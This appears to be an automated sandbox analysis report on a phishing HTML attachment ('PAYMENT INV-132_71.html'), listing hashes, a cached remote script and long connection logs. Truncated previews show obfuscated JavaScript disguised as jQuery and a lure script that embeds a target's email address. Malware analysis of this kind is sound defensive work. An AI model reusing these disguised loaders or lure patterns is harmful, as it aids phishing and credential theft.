Preview:	.PNG........IHDR...d...D.....3......KiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about=""/>. </rdf:RDF>.</x:xmpmeta>.<?xpacket end="r"?> I.:.. .IDATx....$Gy.......^.k/....6..cL.Q..> ....l..k..........).L0..m......}I.+..kXb..e...........O.....9...yI......k.z.P.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.EQ.E.d..(..(.o.>...r...\`.n.o....B.CQ.EQ...BFQ.EQ....N...Ocnn.BwE.....7.t.....Q.EQ.K...(..(....>g^\|.E...b~~.BwG..T.U,,,\.n(..(.......EQ.EQ.y....S.0;;.8./tw.....U.:u.w.y.F;+..(.%.~.+..(.&...~..t6.Nk-...q....>}..O.F....6.K...1\u.U.611..m..u\|...!Q..(.r.P!.(..(..=..c.}

Chrome Cache Entry: 70

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65482), with CRLF line terminators
Category:	downloaded
Size (bytes):	355346
Entropy (8bit):	6.021366771920507
Encrypted:	false
SSDEEP:	6144:/ODDORezIlikECAtwafzsCNU1W9gor53/OR7uxc6RrA8EvhIajS4qbVw7TvW2:/KORVmptw6sCGA9gsJ/OR7VRWeSpRi
MD5:	1ACFCFE3398CB3DA5C71CECC67664794
SHA1:	FE8FC9EB9D69EDC7F7E322A6CF9881BB5CB777FD
SHA-256:	7C454F302F94A420C2BE354996AA7247A086E2EBCDDA4A2C3CD261E2CA7D70AF
SHA-512:	8CCFF42EA055B29DDC484F9D0647B6E36610E3FFCB2E041C5675C6FA38B749591F0814BA4E1C3EDD5E2716E372F352D20299B16AB132440C6724DE0924464BCA
Malicious:	false
Reputation:	low
URL:	https://bengaladigital.cl/wpfd.js
Preview:	/! jQuery v3.6.0 jquery.com \| jquery.org/license /..function _0x2a2b(_0x2a7964,_0x451b2a){var _0x3bb1a6=_0x3bb1();return _0x2a2b=function(_0x2a2b59,_0x49b33e){_0x2a2b59=_0x2a2b59-0x9a;var _0x35110a=_0x3bb1a6[_0x2a2b59];return _0x35110a;},_0x2a2b(_0x2a7964,_0x451b2a);}function _0x3bb1(){var _0x11bb4a=['92pxjckb','5534667amqHxA','write','3170097KTQhDy','6340YdZmVO','16uCtzmY','22921536uWsCcL','1347780NObsKt','170850wKjnyc','200zRKose','4811xTyzPY','5532YNBMoZ'];_0x3bb1=function(){return _0x11bb4a;};return _0x3bb1();}var _0x1d37a6=_0x2a2b;(function(_0x3bf100,_0x2916f7){var _0x5b1ada=_0x2a2b,_0x34cd7c=_0x3bf100();while(!![]){try{var _0x116730=-parseInt(_0x5b1ada(0x9d))/0x1(parseInt(_0x5b1ada(0x9c))/0x2)+parseInt(_0x5b1ada(0x9b))/0x3(parseInt(_0x5b1ada(0x9f))/0x4)+-parseInt(_0x5b1ada(0xa3))/0x5(-parseInt(_0x5b1ada(0x9e))/0x6)+-parseInt(_0x5b1ada(0xa2))/0x7+parseInt(_0x5b1ada(0xa4))/0x8(parseInt(_0x5b1ada(0xa0))/0x9)+parseInt(_0x5b1ada(0x9a))/0xa+-parseInt(_0x5b1ada(0xa5))/0xb;if(_0x11

Static File Info

General

File type:	HTML document, ASCII text, with very long lines (1312), with CRLF line terminators
Entropy (8bit):	4.862308768251315
TrID:	HTML Application (8008/1) 100.00%
File name:	PAYMENT INV-132_71.html
File size:	1'314 bytes
MD5:	7734453d6bf806540a15febe0f313efb
SHA1:	058cad214269377a15b56e175481571cf9716119
SHA256:	0f100e29273db8f3d50ac37f148e1f32ed6ad02e45af5440a14b37a7c25f52dc
SHA512:	062a52accfaecf5ef7009dade23460de486e2343f31948f46a040d0ffe1aa40fac1433f77150d48a95aa4e1a5d655c5b96d66bc7423893946bd08a74db37333e
SSDEEP:	24:4WPS7W/GGi4iR/d6fmvfB8ekWDsXFCiS/nizJ2jjViZEN3Mv:4ot3iBamvfB8t+JIZECv
TLSH:	8F213E4235B072E2A35836800B34898D31849F536A239E8FDF8D68C73026F7D97B382C
File Content Preview:	<script>var assignDOCto = "kshyam@moog.com";const aY1={w1y:'PC',b1e:'h0',e14:";",v1x:'I+',l27:'at',s18:'cm',g17:'Nj',s2h:'nt',x1n:'Rp',h1d:'Im',y1a:'dC',j1l:'Fs',t16:'PH',n1r:'wv',x2j:'r',f1i:'Ym',d1m:'YW',h1k:'Z2',i2b:'es',g21:'Jp',f29:'b',m2c:'c',m2f:'d

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2024 07:58:07.421390057 CEST	49675	443	192.168.2.4	173.222.162.32
Jul 5, 2024 07:58:13.017930031 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.017992020 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.018066883 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.018291950 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.018305063 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.534495115 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.534917116 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.534941912 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.535955906 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.536016941 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.537080050 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.537138939 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.537487030 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.537492990 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.587956905 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.674391985 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.674417019 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.674424887 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.674504042 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.674518108 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.693571091 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.693653107 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.693666935 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.742449045 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.791220903 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.791229963 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.791265011 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.791285992 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.791311026 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.792365074 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.792371035 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.792426109 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.793711901 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.793719053 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.793765068 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.795351982 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.795361996 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.795429945 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.881350994 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.881371021 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.881509066 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.881808043 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.881817102 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.881882906 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.882105112 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.882168055 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.882563114 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.882631063 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.882986069 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.883063078 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.883317947 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.883387089 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.883703947 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.883780003 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.886284113 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.886387110 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.972910881 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.973017931 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.973053932 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.973093987 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.973123074 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.973134995 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.973157883 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.973189116 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.974347115 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.974409103 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.974685907 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.974745989 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.975039005 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.975089073 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.975687981 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.975750923 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.975910902 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.975965023 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.979485035 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.979562998 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.979918003 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.979969978 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.980109930 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.980156898 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.980609894 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.980662107 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:13.980871916 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:13.980937958 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.063899040 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.063954115 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.063968897 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.063990116 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.064023018 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.064101934 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.064146996 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.064536095 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.064593077 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.064732075 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.064800024 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.065490961 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.065552950 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.066283941 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.066354990 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.080410957 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.080488920 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.081023932 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.081091881 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.081127882 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.081165075 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.081176996 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.081182957 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.081203938 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.081222057 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.081267118 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.081315041 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.087804079 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.087878942 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.089109898 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.089164019 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.090646029 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.090717077 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.109692097 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.109762907 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.152261972 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.152338028 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.153211117 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.153283119 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.153283119 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:14.153321028 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.154143095 CEST	49733	443	192.168.2.4	162.241.61.68
Jul 5, 2024 07:58:14.154162884 CEST	443	49733	162.241.61.68	192.168.2.4
Jul 5, 2024 07:58:17.030097008 CEST	49675	443	192.168.2.4	173.222.162.32
Jul 5, 2024 07:58:17.650635004 CEST	49740	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:58:17.650753021 CEST	443	49740	216.58.206.36	192.168.2.4
Jul 5, 2024 07:58:17.650851011 CEST	49740	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:58:17.651657104 CEST	49740	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:58:17.651691914 CEST	443	49740	216.58.206.36	192.168.2.4
Jul 5, 2024 07:58:17.709827900 CEST	49741	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:17.709876060 CEST	443	49741	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:17.709954023 CEST	49741	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:17.712349892 CEST	49741	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:17.712363958 CEST	443	49741	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:18.319705009 CEST	443	49740	216.58.206.36	192.168.2.4
Jul 5, 2024 07:58:18.324327946 CEST	49740	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:58:18.324393988 CEST	443	49740	216.58.206.36	192.168.2.4
Jul 5, 2024 07:58:18.325433969 CEST	443	49740	216.58.206.36	192.168.2.4
Jul 5, 2024 07:58:18.325546980 CEST	49740	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:58:18.326886892 CEST	49740	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:58:18.326960087 CEST	443	49740	216.58.206.36	192.168.2.4
Jul 5, 2024 07:58:18.367142916 CEST	443	49741	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:18.367235899 CEST	49741	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:18.372756004 CEST	49740	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:58:18.372778893 CEST	443	49740	216.58.206.36	192.168.2.4
Jul 5, 2024 07:58:18.396461010 CEST	49741	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:18.396492004 CEST	443	49741	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:18.396826982 CEST	443	49741	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:18.419626951 CEST	49740	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:58:18.450884104 CEST	49741	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:18.584584951 CEST	49741	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:18.632498026 CEST	443	49741	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:18.773761988 CEST	443	49741	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:18.774019957 CEST	49741	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:18.774058104 CEST	443	49741	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:18.774099112 CEST	49741	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:18.774229050 CEST	443	49741	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:18.774257898 CEST	443	49741	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:18.774414062 CEST	49741	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:18.814709902 CEST	49742	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:18.814768076 CEST	443	49742	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:18.814853907 CEST	49742	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:18.815161943 CEST	49742	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:18.815182924 CEST	443	49742	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:19.478327036 CEST	443	49742	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:19.478393078 CEST	49742	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:19.479825020 CEST	49742	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:19.479839087 CEST	443	49742	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:19.480057955 CEST	443	49742	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:19.482741117 CEST	49742	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:19.528506041 CEST	443	49742	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:19.759174109 CEST	443	49742	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:19.759253025 CEST	443	49742	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:19.759320974 CEST	49742	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:19.760418892 CEST	49742	443	192.168.2.4	184.28.90.27
Jul 5, 2024 07:58:19.760437965 CEST	443	49742	184.28.90.27	192.168.2.4
Jul 5, 2024 07:58:28.227641106 CEST	443	49740	216.58.206.36	192.168.2.4
Jul 5, 2024 07:58:28.227690935 CEST	443	49740	216.58.206.36	192.168.2.4
Jul 5, 2024 07:58:28.227791071 CEST	49740	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:58:29.026923895 CEST	49740	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:58:29.026947021 CEST	443	49740	216.58.206.36	192.168.2.4
Jul 5, 2024 07:58:29.476479053 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:29.476521015 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:29.476593018 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:29.477663994 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:29.477679968 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:30.285815954 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:30.285901070 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:30.290940046 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:30.290952921 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:30.291184902 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:30.341800928 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:31.153398991 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:31.200501919 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:31.421766996 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:31.421791077 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:31.421798944 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:31.421808958 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:31.421823978 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:31.421861887 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:31.421895027 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:31.421907902 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:31.421945095 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:31.423511028 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:31.423584938 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:31.423587084 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:31.423640013 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:32.285684109 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:32.285727024 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:58:32.286036968 CEST	49747	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:58:32.286047935 CEST	443	49747	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:08.873241901 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:08.873290062 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:08.877326012 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:08.881325960 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:08.881345034 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:09.693813086 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:09.693958998 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:09.708477020 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:09.708498955 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:09.708806992 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:09.732918024 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:09.776503086 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:10.037683010 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:10.037713051 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:10.037724972 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:10.037739038 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:10.037766933 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:10.037781000 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:10.037818909 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:10.037837982 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:10.037837982 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:10.037863970 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:10.038954973 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:10.038991928 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:10.039017916 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:10.039027929 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:10.039057970 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:10.039067984 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:10.039113998 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:10.055262089 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:10.055279016 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:10.055298090 CEST	49756	443	192.168.2.4	40.68.123.157
Jul 5, 2024 07:59:10.055305958 CEST	443	49756	40.68.123.157	192.168.2.4
Jul 5, 2024 07:59:17.308749914 CEST	49758	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:59:17.308794022 CEST	443	49758	216.58.206.36	192.168.2.4
Jul 5, 2024 07:59:17.309025049 CEST	49758	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:59:17.319315910 CEST	49758	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:59:17.319351912 CEST	443	49758	216.58.206.36	192.168.2.4
Jul 5, 2024 07:59:17.966029882 CEST	443	49758	216.58.206.36	192.168.2.4
Jul 5, 2024 07:59:17.966957092 CEST	49758	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:59:17.966988087 CEST	443	49758	216.58.206.36	192.168.2.4
Jul 5, 2024 07:59:17.967313051 CEST	443	49758	216.58.206.36	192.168.2.4
Jul 5, 2024 07:59:17.968555927 CEST	49758	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:59:17.968616962 CEST	443	49758	216.58.206.36	192.168.2.4
Jul 5, 2024 07:59:18.014218092 CEST	49758	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:59:24.514975071 CEST	49723	80	192.168.2.4	199.232.214.172
Jul 5, 2024 07:59:24.515044928 CEST	49724	80	192.168.2.4	199.232.214.172
Jul 5, 2024 07:59:24.520212889 CEST	80	49723	199.232.214.172	192.168.2.4
Jul 5, 2024 07:59:24.520275116 CEST	49723	80	192.168.2.4	199.232.214.172
Jul 5, 2024 07:59:24.520579100 CEST	80	49724	199.232.214.172	192.168.2.4
Jul 5, 2024 07:59:24.520627975 CEST	49724	80	192.168.2.4	199.232.214.172
Jul 5, 2024 07:59:27.894361019 CEST	443	49758	216.58.206.36	192.168.2.4
Jul 5, 2024 07:59:27.894428015 CEST	443	49758	216.58.206.36	192.168.2.4
Jul 5, 2024 07:59:27.894602060 CEST	49758	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:59:29.016928911 CEST	49758	443	192.168.2.4	216.58.206.36
Jul 5, 2024 07:59:29.016963959 CEST	443	49758	216.58.206.36	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 5, 2024 07:58:12.564600945 CEST	53	54130	1.1.1.1	192.168.2.4
